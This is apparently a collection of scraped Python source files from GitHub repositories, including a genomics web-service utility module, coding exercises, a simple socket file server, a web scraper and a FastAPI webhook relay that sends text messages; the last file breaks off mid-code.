hasattr(obj, \"isoformat\"):\n        return obj.isoformat()\n    else:\n        raise TypeError(\"Object can not be isoformatted.\")\n\n\n################################\n# Useful data-serving handlers #\n################################\n\n\nclass DataHandler(UnsafeHandler):\n    \"\"\"Serves a listing of all available URLs in the web service.\"\"\"\n\n    def get(self):\n        self.set_header(\"Content-type\", \"application/json\")\n        handlers = []\n        for h in self.application.declared_handlers:\n            try:\n                handlers.append(h[0])\n            except TypeError:  # 'URLSpec' object does not support indexing\n                handlers.append(h.regex.pattern)\n        api = [h for h in handlers if h.startswith(\"/api\")]\n        utils = [h for h in handlers if h == \"/login\" or h == \"/logout\" or h == \".*\"]\n        pages = list(set(handlers).difference(set(api)).difference(set(utils)))\n        pages = [h for h in pages if not (h.endswith(\"?\") or h.endswith(\"$\"))]\n        pages.sort(reverse=True)\n        api.sort(reverse=True)\n        self.write(json.dumps({\"api\": api, \"pages\": pages}))\n\n\nclass UpdatedDocumentsDatahandler(SafeHandler):\n    \"\"\"Serves a list of references to the last updated documents in the\n    databases Status gets data from.\n\n    Specify to get the latest items by ?items=.\n\n    Loaded through /api/v1/last_updated\n    \"\"\"\n\n    def get(self):\n        num_items = int(self.get_argument(\"items\", 25))\n        self.set_header(\"Content-type\", \"application/json\")\n        self.write(json.dumps(self.list_updated(num_items)))\n\n    def list_updated(self, num_items=25):\n        last = []\n\n        view = self.application.projects_db.view(\n            \"time/last_updated\", limit=num_items, descending=True\n        )\n        for doc in view:\n            last.append((doc.key, doc.value, \"Project information\"))\n\n        view = self.application.flowcells_db.view(\n            \"time/last_updated\", limit=num_items, descending=True\n        )\n        for doc in view:\n            last.append((doc.key, doc.value, \"Flowcell information\"))\n\n        last = sorted(last, key=lambda tr: tr[0], reverse=True)\n        return last[:num_items]\n\n\nclass NoCacheStaticFileHandler(tornado.web.StaticFileHandler):\n    \"\"\"Serves up static files without any tornado caching.\n    https://gist.github.com/omarish/5499385\n    \"\"\"\n\n    def set_extra_headers(self, path):\n        self.set_header(\"Cache-control\", \"no-cache\")\n\n\n
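# The handler below stats the PSUL logfile and reports how long ago it was\n# last updated, as JSON with \"status\", \"hours\", \"minutes\" and \"seconds\" keys.\n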
class LastPSULRunHandler(SafeHandler):\n    \"\"\"Gives the date of the last PSUL run, assuming the logfile is where we expect it\"\"\"\n\n    def get(self):\n        logfile = self.application.psul_log\n        response = {}\n        try:\n            text_timestamp = os.stat(logfile).st_mtime\n            delta = datetime.now() - datetime.fromtimestamp(int(text_timestamp))\n        except (OSError, KeyError, TypeError):\n            response[\"status\"] = \"Log File '{}' not found.\".format(logfile)\n        else:\n            response[\"status\"] = \"Success\"\n            # use total_seconds() so runs older than a day are not silently truncated\n            total_seconds = int(delta.total_seconds())\n            response[\"hours\"] = total_seconds // 3600\n            response[\"minutes\"] = (total_seconds % 3600) // 60\n            response[\"seconds\"] = total_seconds % 60\n\n        self.set_header(\"Content-type\", \"application/json\")\n        self.write(json.dumps(response))\n\n\n########################\n# Other useful classes #\n########################\n\n\nclass GoogleUser(object):\n    \"\"\"Stores the information that google returns from a user through its secured API.\"\"\"\n\n    def __init__(self, user_token):\n        assert \"access_token\" in user_token\n\n        self.user_token = user_token\n        self._google_plus_api = \"https://www.googleapis.com/plus/v1/people/me\"\n\n        # Fetch actual information from Google API\n        params = {\"access_token\": self.user_token.get(\"access_token\")}\n        r = requests.get(self._google_plus_api, params=params)\n        if not r.status_code == requests.status_codes.codes.OK:\n            self.authenticated = False\n        else:\n            self.authenticated = True\n            info = json.loads(r.text)\n            self.display_name = info.get(\"displayName\", \"\")\n            self.emails = [email[\"value\"] for email in info.get(\"emails\")]\n\n    def is_authorized(self, user_view):\n        \"\"\"Checks that the user is actually authorised to use genomics-status.\"\"\"\n        authenticated = False\n        for email in self.emails:\n            if user_view[email]:\n                self.valid_email = email\n                authenticated = True\n        return authenticated\n","repo_name":"SciLifeLab/genomics-status","sub_path":"status/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":14065,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"}
{"seq_id":"22347999909","text":"from csv import DictReader\nfrom os import path\n\nfolder = path.dirname(path.abspath(__file__))\n\nwith open(path.join(folder, 'anagrams.csv'), newline='') as file:\n    answers = list(map(lambda row: {\n        'answer': row['answer'],\n        'category': row['category'],\n        'subcategory': row['subcategory']\n    }, DictReader(file)))\n","repo_name":"TypeError92/nc-final-project-data","sub_path":"db/data/dev/answers.py","file_name":"answers.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"8155489972","text":"'''\n\nRegular polyhedra (dice)\n\nSample input: 4 6\n*Approach: build a cnt list over every possible sum of the two dice and\nincrement the count each time a face combination produces that sum\n'''\n\nn, m = map(int, input().split())\n\ncnt = [0] * (n+m+3)\nfor i in range(1, n+1):\n    for j in range(1, m+1):\n        cnt[i+j] += 1\n\n# find the maximum count\nmaxCnt = 0\nfor i in range(n+m+1):\n    if cnt[i] > maxCnt:\n        maxCnt = cnt[i]\n\n# print every sum whose count equals the maximum\nfor i in range(n+m+1):\n    if cnt[i] == maxCnt:\n        print(i, end=\" \")\n","repo_name":"joorani/Algorithm","sub_path":"강의/chapter2/2-5.py","file_name":"2-5.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"42457094961","text":"from socket import *\r\n\r\nhost = '142.55.107.217' #Server IP address\r\n\r\nport = 5555 #This port will be bound in server\r\nbacklog = 5 #The backlog is the maximum number of queued connections\r\nsize = 1480\r\n\r\n
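# create a TCP listening socket; 'backlog' caps the queue of pending connections\r\n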
listensock = socket(AF_INET,SOCK_STREAM)\nlistensock.bind((host,port))\nlistensock.listen(backlog)\nservercloseflag = False\n\nwhile not servercloseflag:\n \tprint('Waiting for client connection...')\n \tclientsock, clientaddress = listensock.accept()\n \tprint('Received connection from :', \n \t\t\tclientaddress[0], \n \t\t\t'on port: ',\n\t\t\tclientaddress[1])\n \trecdata = clientsock.recv(size) #Received data of byte type\n \t\n \tfile_name = recdata.decode()\n \tfile_data = \"\"\n \tfiles = open(file_name)\n \tfor line in files:\n \t\tfile_data = file_data + (line) + '\\n'\n\n\n \twhile recdata:\n \t\tprint('Received data from ', clientaddress[0], ': ',recdata.decode())\n \t\tclientsock.send(file_data.encode()) #echo back (test only)\n \t\trecdata= clientsock.recv(size)\n \n \t\tif recdata.decode() == 'end' or recdata.decode() == 'quit': #close client first\n \t\t\tprint('Closing connection with ', clientaddress[0])\n \t\t\tclientsock.close()\n \t\t\tbreak\n \n \tif recdata.decode() == 'quit': #Close server\n \t\tservercloseflag = True\n\nprint('Closing server:')\nlistensock.close()\nprint('Bye...')\n","repo_name":"charlesjavelona/server-client","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"42185084802","text":"#In this program, it is assumed that a pilot changes alpha only twice:\n#first he changes alpha from 0 degrees to some value,\n#and the second time he changes it from that value back to 0 degrees.\n#\n#optimize with respect to t1, t2, and alpha.\n#we chose gradient descent as the algorithm.\n#\n\nimport param\nfrom flight_simulator import *\nfrom file_func import *\n\n\ndt = 0.05\nt_list = np.arange(0, 15, dt)\n\n#objective function\ndef obj_func(t1, t2, alpha):\n    alpha_list = np.zeros(len(t_list))\n    for i in range(len(t_list)):\n        if (t_list[i]<t1) or (t_list[i]>t2):\n            continue\n        \n        alpha_list[i] = alpha\n    \n    state_list = runge_kutta(param.STATE0, dt, t_list, alpha_list)\n    return 1 # To be implemented\n    \n#derivative of the objective function by central finite differences\ndef grad_obj_func1(t1, t2, alpha):\n    result_list = np.zeros(3)\n    dalpha = 0.3\n\n    result_list[0] = (obj_func(t1+dt, t2, alpha) - obj_func(t1-dt, t2, alpha))/(2*dt)\n    result_list[1] = (obj_func(t1, t2+dt, alpha) - obj_func(t1, t2-dt, alpha))/(2*dt)\n    result_list[2] = (obj_func(t1, t2, alpha+dalpha) - obj_func(t1, t2, alpha-dalpha))/(2*dalpha)\n    \n    return result_list\n\n\n#calculate norm**2 of vec\ndef calc_norm2(vec):\n    norm2 = 0\n    for x in vec:\n        norm2 += x**2\n    return norm2\n\n#backtracking line search along the negative gradient\ndef calc_step_size(t1, t2, alpha):\n    step_size = 1 #initial step size\n    xi = 0.0001\n    rho = 0.8 #To be reviewed\n    grd = grad_obj_func1(t1, t2, alpha)\n    \n    norm2 = calc_norm2(grd)\n    \n    #use the Armijo condition on the trial point x - step_size*grad\n    while (obj_func(t1-step_size*grd[0], t2-step_size*grd[1], alpha-step_size*grd[2]) > obj_func(t1, t2, alpha) - xi*step_size*norm2):\n        step_size *= rho\n    \n    return step_size\n\n    \ndef main():\n    alpha = radians(5)\n    t1 = 3\n    t2 = 8\n    epsilon = 3*0.000001\n    \n    #optimization\n    for i in range(100):\n        grd = grad_obj_func1(t1, t2, alpha)\n        if (calc_norm2(grd) <= epsilon**2):\n            print(\"Found best operation!\")\n            break\n\n        #step against the gradient (descent direction)\n        step = calc_step_size(t1, t2, alpha)\n        t1 -= step*grd[0]\n        t2 -= step*grd[1]\n        alpha -= step*grd[2]\n\n    print(\"Cost is\", obj_func(t1, t2, alpha))\n\n    alpha_list = np.zeros(len(t_list))\n    for i in range(len(t_list)):\n        if (t_list[i]<t1) or (t_list[i]>t2):\n            continue\n        \n        alpha_list[i] = alpha\n    \n    \n    state_list = runge_kutta(param.STATE0,dt,t_list,alpha_list)\n    
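# plot the optimised trajectory and persist it to CSV for later comparison\n    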
plot_state_list(state_list)\n store_trajectory(t_list,state_list,alpha_list,'./data/best_operation_every_alpha.csv')\n\nif __name__ == '__main__':\n main()\n \n","repo_name":"BirdmanTeamShootingStars/FlightSimulator","sub_path":"optimization_2_alpha.py","file_name":"optimization_2_alpha.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73028740703","text":"# coding: utf-8\nimport numpy as np\nimport AI_debug\nfrom tf_model import load_existing_model\n\nboard_size=15\ndef read_board_state(f):\n # default\n black_stones = set()\n white_stones = set()\n board = [black_stones, white_stones]\n last_move = None\n playing = 0\n # read and parse board\n for line in open(f):\n if '|' in line:\n line_idx, contents = line.split('|', maxsplit=1)\n row_i = int(line_idx) - 1\n ls = contents.split()\n if len(ls) == board_size:\n for col_j, s in enumerate(ls):\n stone = (row_i+1, col_j+1)\n if s == 'x':\n black_stones.add(stone)\n elif s == 'X':\n black_stones.add(stone)\n last_move = stone\n playing = 1\n elif s == 'o':\n white_stones.add(stone)\n elif s == 'O':\n white_stones.add(stone)\n last_move = stone\n playing = 0\n elif s == '-':\n pass\n else:\n print(f'found unknown stone: {s}')\n board_state = [board, last_move, playing, board_size]\n return board_state\n\nboard_state = read_board_state('debug_board.txt')\n\n\nmodel = load_existing_model('tf_model.h5')\nAI_debug.tf_predict_u.model = model\nAI_debug.initialize() \n\nprint(AI_debug.strategy(board_state))\n","repo_name":"yudongqiu/gomoku","sub_path":"swap_start/auto_playok_com/debug/debug_state.py","file_name":"debug_state.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"40450839254","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 21 10:29:42 2017\n\n@author: abyss\n\"\"\"\n\ndef valid_yesno(entry):\n yes = {'yes','y', 'ye'}\n no = {'no','n',''} \n if entry in yes:\n return True\n elif entry in no:\n return False\n else : \n print (\"Layer 8 issue, skipping\")\n return False \n\ndef doyouwant(whattodo):\n entry=input(\"Do you want to \"+whattodo+\"? 
(y/N)\").lower() \n if valid_yesno(entry) is True :\n return True\n","repo_name":"AbyssAndromalius/HardeningLinux","sub_path":"valid.py","file_name":"valid.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22762652798","text":"from django.contrib import admin\n\n# Register your models here.\nfrom apps.notice.models import Notice\n\n\n@admin.register(Notice)\nclass NoticeAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'title',\n 'user',\n 'date_created'\n )\n\n list_display_links = (\n 'id',\n 'user',\n )\n","repo_name":"nawarazpokhrel/gces_backend","sub_path":"apps/notice/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28526932658","text":"import time\nimport re\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n# hardcode metacritic url with !NO page number\nmetacritic_url = 'https://www.metacritic.com/browse/games/genre/userscore/real-time/all?view=condensed&page='\nuser_agent = {'User-agent': 'Mozilla/5.0'}\n\n# data set for collected data\nmetacritic_data = {'name': [], 'date': [], 'platform': [], 'score': [], 'reviewCount': [],\n 'style': [], 'developer': [], 'downloads': []}\n\n\n# method to get data for BeautifulSoup\ndef get_page_content(url):\n page = requests.get(url, headers=user_agent)\n return BeautifulSoup(page.text, 'html.parser')\n\n\n# method to add data in dataset from first to selected pages\ndef scrapDataFromMetacritic(endPage):\n current_page = 0\n while current_page < endPage:\n url = metacritic_url + str(current_page)\n\n # Getting data for further parse\n soup = get_page_content(url)\n\n # Parse web-page to find all game names\n for a in soup.find_all('a', {'class': 'title'}):\n for h3 in a.find_all('h3'):\n name = h3.get_text().strip()\n metacritic_data['name'].append(name)\n\n # Parse web-page to find all release dates and platforms (in same cycle because in same 'td')\n for td in soup.find_all('td', {'class', 'details'}):\n # Get game release date\n for date_span in td.find_all('span', {'class': ''}):\n date = date_span.get_text().strip()\n metacritic_data['date'].append(date)\n # Get game platform\n for platform_span in td.find_all('span', {'class': 'data'}):\n platform = platform_span.get_text().strip()\n metacritic_data['platform'].append(platform)\n\n # Parse web-page to find all user scores\n for meta_score in soup.find_all('div', {'class': 'metascore_w user large game positive'}):\n score = meta_score.get_text().strip()\n metacritic_data['score'].append(score)\n\n # Move to game page to extract review count, developer and style\n for gamePage in soup.find_all('a', {'class': 'title'}):\n new_url = 'https://www.metacritic.com' + gamePage['href']\n new_page = requests.get(new_url, headers=user_agent)\n new_soup = BeautifulSoup(new_page.text, 'html.parser')\n # Find and scrap review count\n for review_span in new_soup.find_all(name='a',\n attrs={'href': gamePage['href'] + '/user-reviews', 'class': ''},\n limit=1):\n review_count = re.findall(r'\\d+', review_span.get_text().strip())\n metacritic_data['reviewCount'].append(review_count.pop())\n # Find and crap developer\n for developer_span in new_soup.find_all(name='a',\n href=True,\n attrs={'class': 'button'},\n limit=1):\n metacritic_data['developer'].append(developer_span.get_text().strip())\n # Find and scrap style\n parent = 
new_soup.findChildren('li', {'class': 'summary_detail product_genre'})\n for child in parent:\n text = hyphen_split(child.text)\n metacritic_data['style'].append(text)\n\n # wait some time to not get banned\n time.sleep(6)\n current_page += 1 # transfer to next page\n return metacritic_data\n\n\n# Method to split style text\ndef hyphen_split(a):\n split_text_list = a.split(',')\n return split_text_list[2].strip()\n\n\n# Save result dictionary to csv file\ndef createDataFrame():\n game = pd.DataFrame.from_dict(metacritic_data, orient='index')\n games = game.transpose()\n games.to_csv('games_list.csv', index=False, header=True, mode='w')\n","repo_name":"PashokSy/retrostylegames_tt","sub_path":"MetacriticScrapper.py","file_name":"MetacriticScrapper.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36596965026","text":"import turtle\nimport pandas\n\nturtle.screensize(514, 941, bg=\"light blue\")\nscreen = turtle.Screen()\nscreen.title(\"Israel map Game\")\nscreen.setup(width=0.9, height=0.9)\n\n# image is gif because Turtle can read images just in this way\nimage = \"Israel_relief_location_map.gif\"\n\n# to add backround image\nscreen.addshape(image)\nturtle.shape(image)\n\n# collect the data from csv file\ndata_tribes = pandas.read_csv(\"tribes_name.csv\")\n# collecting from data all the states and converting them to list\nall_tribes = data_tribes.tribe.to_list()\n\n\n# def get_mouse_click_coor(x, y):\n# print(x, y)\n#\n# # that's will listen when the mouse clicks and it will call our get_mouse_click_coor and pass over x and y coordinate\n# turtle.onscreenclick(get_mouse_click_coor)\n\nguessed_tribes = []\n\nwhile len(guessed_tribes) < 12:\n answer_tribe = screen.textinput(title=f\"{len(guessed_tribes)}/12 tribes Correct\",\n prompt=\"What's another tribes name?\").title()\n\n # if the user wrote exit it will end the game and save the results in csv file\n if answer_tribe == \"Exit\":\n missing_tribes= []\n for tribe in all_tribes:\n if tribe not in guessed_tribes:\n missing_tribes.append(tribe)\n new_data = pandas.DataFrame(missing_tribes)\n new_data.to_csv(\"tribes_to_learn.csv\")\n break\n\n # If answer_state is one of the states in all states of the 50_states.csv\n if answer_tribe in all_tribes:\n guessed_tribes.append(answer_tribe)\n # If they got it right:\n # Create a Turtle to write the name of the state at the state's x and y coordnate\n t = turtle.Turtle()\n t.hideturtle()\n t.penup()\n # if data.state equal to answer_state\n # write the name of the state at the state's x and y coordnate\n tribe_data = data_tribes[data_tribes.tribe == answer_tribe]\n t.goto(int(tribe_data.x), int(tribe_data.y))\n t.write(tribe_data.tribe.item())\n\n\n# screen.mainloop()\n","repo_name":"AdiMakeItHappens/Israel-tribes-location-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72685520544","text":"from typing import List\n\n\"\"\"\nInput:\ns = \"catsanddog\"\nwordDict = [\"cat\", \"cats\", \"and\", \"sand\", \"dog\"]\n\nOutput:\n[\n \"cats and dog\",\n \"cat sand dog\"\n]\n\"\"\"\n\n\nclass Solution:\n def wordBreak(self, s: str, wordDict: List[str]) -> List[str]:\n\n answer = []\n\n def dfs(string: str, curr_words: List[str]):\n if not string:\n answer.append(' '.join(curr_words))\n return\n\n for word in wordDict:\n # if string[:len(word)] == 
word:\n if string.startswith(word):\n dfs(string[len(word):], curr_words + [word])\n\n dfs(s, [])\n return answer\n\n\n# TLE\n# \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\n# [\"a\",\"aa\",\"aaa\",\"aaaa\",\"aaaaa\",\"aaaaaa\",\"aaaaaaa\",\"aaaaaaaa\",\"aaaaaaaaa\",\"aaaaaaaaaa\"]\n","repo_name":"daviddwlee84/LeetCode","sub_path":"Python3/String/WordBreakII/Backtracking140.py","file_name":"Backtracking140.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"7"} +{"seq_id":"31400234583","text":"files = []\nfor _ in range(int(input())):\n files.append(input().strip())\n\nfor file in files:\n f_input = open(file, 'rt', encoding='utf-8')\n f_output = open('output.txt', 'a', encoding='utf-8')\n for line in f_input:\n f_output.write(line)\n f_input.close()\n f_output.close()\n","repo_name":"Jlexa46/stepikPyAdvanced","sub_path":"Lesson_17/Lesson_17.4/Task_17.4f.py","file_name":"Task_17.4f.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"25964481784","text":"from haversine import haversine\nimport plotly.express as px\nimport plotly.graph_objects as go\n\nimport pandas as pd\nimport numpy as np\nimport streamlit as st\nfrom PIL import Image\nfrom streamlit_folium import folium_static\nimport folium\nfrom folium.plugins import MarkerCluster\n\n\n#df_raw = pd.read_csv('zomato_1.csv', encoding='ISO-8859-1')\n\n#from google.colab import drive\n\n#drive.mount('/content/drive')\n#df_raw = pd.read_csv('dataset/zomato_1.csv', encoding=\"ISO-8859-1\")\ndf_raw = pd.read_csv('dataset/zomato_1.csv', encoding='utf-8')\n\n\ndf = df_raw.copy()\n\n# ===================================================================\n\n#Separando os tipos de culinária em restaurantes que possuem mais de uma:\n\n\ndf['Cuisines'] = df.loc[:, 'Cuisines'].apply(lambda x: str(x).split(\",\")[0])\n\n# Criando uma coluna com o nome dos países baseado em código.\n\ndf['Country name'] = df['Country Code'].replace({\n 1: \"India\",\n 14: \"Australia\",\n 30: \"Brazil\",\n 37: \"Canada\",\n 94: \"Indonesia\",\n 148: \"New Zeland\",\n 162: \"Philippines\",\n 166: \"Qatar\",\n 184: \"Singapure\",\n 189: \"South Africa\",\n 191: \"Sri Lanka\",\n 208: \"Turkey\",\n 214: \"United Arab Emirates\",\n 215: \"England\",\n 216: \"United States of America\",\n})\n\n# Criando uma coluna Categorizando Comidas com base em seus price range\n\n\ndf['Price Type'] = df['Price range'].replace({\n 1: \"cheap\",\n 2: \"normal\",\n 3: \"expensive\",\n 4: \"gourmet\",\n})\n\n# Criando uma coluna com o nome das cores baseado em código de cor.\n\n\ndf['Colors'] = df['Rating color'].replace({\n '3F7E00': \"darkgreen\",\n '5BA829':\"green\",\n '9ACD32': \"lightgreen\",\n 'CDD614': \"orange\",\n 'FFBA00': \"red\",\n 'CBCBC8': \"darkred\",\n 'FF7800': \"darkred\",\n\n})\n\ndef rename_columns(dataframe):\n df = dataframe.copy()\n title = lambda x: inflection.titleize (x)\n snakecase = lambda x: inflection.underscore (x)\n spaces = lambda x: x.replace(\" \", \"\")\n cols_old = list(df.columns)\n cols_old = list(map(title, cols_old))\n cols_old = list(map(spaces, cols_old))\n cols_old = list(map(snakecase, cols_old))\n df.columns = cols_new\n\n return df\n\n# Barra Lateral\n\n#----------------------\n#Barra Lateral\n#--------------------------\nst.header( 'Informações sobre 
culinárias' )\nimage_path = 'logo_zomato1.png'\nimage = Image.open('zomato_logo.jpg')\nst.sidebar.image( image, width=120 )\n\n\nst.sidebar.title( '' )\nst.sidebar.markdown( '## Filtro ' )\n\nst.sidebar.markdown( \"\"\"___\"\"\" )\n\nst.sidebar.markdown( '## Seleção de países por exclusão')\n\ncountry_options = st.sidebar.multiselect(\n 'Quais países?',\n ['India','Australia','Brazil','Canada','Indonesia',\"New Zeland\",\"Philippines\",\"Qatar\",\"Singapure\",\"South Africa\",\"Sri Lanka\",\"Turkey\",\"United Arab Emirates\",\"England\",\"United States of America\"],\n default= ['India','Australia','Brazil','Canada','Indonesia',\"New Zeland\",\"Philippines\",\"Qatar\",\"Singapure\",\"South Africa\",\"Sri Lanka\",\"Turkey\",\"United Arab Emirates\",\"England\",\"United States of America\"] )\n\nst.sidebar.markdown(\"\"\"___\"\"\")\n\n#Filtro de país\nlinhas_selecionadas = df['Country name'].isin(country_options)\ndf = df.loc[linhas_selecionadas, :]\n\n#-------------------------------------------------------------------\n\n# contagem de quantas culinárias totais\n# gráfico com cuinárias mais presentes\n\n# ----------------------------------------------------------\n# top italiano\n# top árabe\n# top japones\n\n#--------------------------------------\n\n# gráfico com culinárias que mais fazem entregas\n#---------------------------------------------------------------\nwith st.container():\n st.markdown(\"\"\"___\"\"\")\n st.subheader( 'Avaliações médias de culinárias' )\n\ncol1, col2, col3, col4 = st.columns( 4 )\nwith col1:\n # st.subheader( 'Quantidade total de culinárias')\n\n df_aux1 = df.loc[:,'Cuisines'].nunique()\n \n col1.metric('Variedade de culinárias',df_aux1)\n\nwith col2:\n \n df_cn = (df.loc[:,['Cuisines','Aggregate rating']].groupby('Cuisines').mean().sort_values('Aggregate rating', ascending=False))\n \n df_aux = df_cn[df_cn['Aggregate rating'].between(4.00, 10.00)].count()\n \n \n col2.metric('Avaliações acima de 4.0',df_aux)\n \n \nwith col3:\n df_cn = (df.loc[:,['Cuisines','Aggregate rating']].groupby('Cuisines').mean().sort_values('Aggregate rating', ascending=False))\n \n df_aux = df_cn[df_cn['Aggregate rating'].between(3.00, 3.99)].count()\n \n \n col3.metric('Entre 3.0 e 4.0',df_aux)\n \nwith col4:\n \n df_cn = (df.loc[:,['Cuisines','Aggregate rating']].groupby('Cuisines').mean().sort_values('Aggregate rating', ascending=False))\n \n df_aux = df_cn[df_cn['Aggregate rating'].between(0.00, 2.99)].count()\n \n \n col4.metric('Abaixo de 3.0',df_aux)\n\n \n\n\n#------------------------------------------------------------------\n\nwith st.container():\n \n st.markdown('## 20 Culinárias mais comuns')\n \n\n\n df_aux = df.loc[:, ['Cuisines','Country name']].groupby('Cuisines').count().sort_values(['Country name'], ascending=False).head(20)\n\n df_aux = df_aux.reset_index()\n\n fig = px.bar(df_aux, x= 'Cuisines', y= 'Country name')\n\n #fig.show()\n\n st.plotly_chart( fig, use_container_width=True )\n\n\n\n#------------------------------------------------------------------\n\nwith st.container():\n\n\n st.markdown(\"\"\"___\"\"\") \n\n st.subheader( 'Culinárias dos restaurantes que mais fazem entregas online')\n\n df_online1 = df[df['Has Online delivery'].isin([1])]\n\n df_online1_delivery1 = df_online1[df_online1['Is delivering now'].isin([1])]\n\n df_aux1 = (df_online1_delivery1.loc[: , ['Restaurant Name', 'Cuisines']].groupby('Cuisines').count().sort_values('Restaurant Name', ascending=False)).head(10)\n \n df_aux1 = df_aux1.reset_index()\n \n fig = px.bar(df_aux1, x= 
'Cuisines' , y= 'Restaurant Name')\n \n st.plotly_chart( fig, use_container_width=True )\n\n#-------------------------------------------------------------------\n \n st.subheader( 'Fast Foods mais bem avaliados e seus respectivos países')\n\n \n df_c = df[df['Cuisines'] == ('Fast Food')]\n\n\n df_aux2 = (df_c.loc[:,['Restaurant Name', 'Country name', 'Aggregate rating']]\n .groupby( ['Country name','Restaurant Name'])\n .agg({'Aggregate rating':['mean']}))\n\n df_aux2.columns = ['mean']\n\n df_aux2 = df_aux2.reset_index().sort_values(['mean'], ascending=False)\n \n st.dataframe(df_aux2)\n \n \n #------------------------------\n \n \n st.subheader( 'Restaurantes de culinária brasileira mais bem avaliados e seus respectivos países')\n\n \n df_c = df[df['Cuisines'] == ('Brazilian')]\n\n\n df_aux2 = (df_c.loc[:,['Restaurant Name', 'Country name', 'Aggregate rating']]\n .groupby( ['Country name','Restaurant Name'])\n .agg({'Aggregate rating':['mean']}))\n\n df_aux2.columns = ['mean']\n\n df_aux2 = df_aux2.reset_index().sort_values(['mean'], ascending=False)\n \n st.dataframe(df_aux2)\n \n #-----------------------------------------------------------------\n \n \n\n # --------------------------------------------------\n \n st.subheader( 'Restaurantes de culinária italiana mais bem avaliados e seus respectivos países')\n\n \n df_c = df[df['Cuisines'] == ('Italian')]\n\n\n df_aux2 = (df_c.loc[:,['Restaurant Name', 'Country name', 'Aggregate rating']]\n .groupby( ['Country name','Restaurant Name'])\n .agg({'Aggregate rating':['mean']}))\n df_aux2.columns = ['mean']\n\n df_aux2 = df_aux2.reset_index().sort_values(['mean'], ascending=False)\n \n st.dataframe(df_aux2)\n \n #---------------------------------------------------------------\n \n st.subheader( 'Restaurantes de culinária japonesa mais bem avaliados e seus respectivos países')\n\n\n \n df_c = df[df['Cuisines'] == ('Japanese')]\n\n\n df_aux2 = (df_c.loc[:,['Restaurant Name', 'Country name', 'Aggregate rating']]\n .groupby( ['Country name','Restaurant Name'])\n .agg({'Aggregate rating':['mean']}))\n\n df_aux2.columns = ['mean']\n\n df_aux2 = df_aux2.reset_index().sort_values(['mean'], ascending=False)\n \n st.dataframe(df_aux2)\n \n #-----------------------------------------------------------------------\n \n\n \n","repo_name":"caiomont96/caio_mont_zomato_1","sub_path":"pages/3_cuinarias.py","file_name":"3_cuinarias.py","file_ext":"py","file_size_in_byte":8259,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36697366441","text":"# python imports\nfrom fastapi import FastAPI, Request\nfrom urllib import request\nfrom src.base_models import *\nimport requests\nimport uuid\nimport json\nimport os\n\n# internal imports\nfrom src.relay.relay import relay_\nfrom src.phone_numbers import NUMBERS\nfrom src.twilio_client import sendMessage\nfrom src.parse_webhook import *\n\n#postgres server\nfrom src.postgres.models import User, Task, TodoList, Idea\nfrom src.postgres.crud import Backend_Interface\n\n# startup\napp = FastAPI()\ninterface = Backend_Interface()\n\ndo_all_texts = False\n\n####### ROUTES [Basic] #######\n\n\n@app.get(\"/ping\", status_code=200)\nasync def ping():\n return {\"message\": \"pong\"} \n\n\n####### ROUTES [MAIN] #######\n\n\n@app.post(\"/relay\", status_code=200)\nasync def _relay(request: RelayRequest):\n try:\n response = relay_(request.endpoint, request.method, request.oauth_token)\n return {\"message\": \"success\", \"response\": response.content}\n except 
Exception as e:\n        return {\"message\": \"error\", \"exception\" : str(e)}\n\n    \n# post github data (testing)\n@app.post(\"/data\", status_code=200)\nasync def scrape_(request: OauthPostRequest):\n    return request\n\n# receive data from github\n@app.post(\"/webhook\", status_code=200)\nasync def webhook(request: Request):\n    \n    body_data = await request.json()\n\n    # universal data\n    repo = body_data['repository']['name']\n    sender = body_data['sender']['login']\n\n    try:\n        phone = interface.get_user(sender)[3]\n    except:\n        phone = None\n    \n    # use elif so an earlier match is not overwritten by the trailing else\n    if 'check_run' in body_data:\n        body = parse_check_run(body_data)\n    elif 'head_commit' in body_data:\n        body = parse_push(body_data)\n    elif 'issue' in body_data:\n        body = parse_issue(body_data)\n    else:\n        body = None\n\n    if body is not None: \n        \n        if phone is None:\n            \n            for number in NUMBERS:\n                sendMessage(body, number)\n        \n        else:\n            sendMessage(body, phone)\n            sendMessage(\"sent\", NUMBERS[0])\n    \n    else:\n        if do_all_texts:\n            for number in NUMBERS:\n                keys = []\n                for key in body_data:\n                    keys.append(key)\n                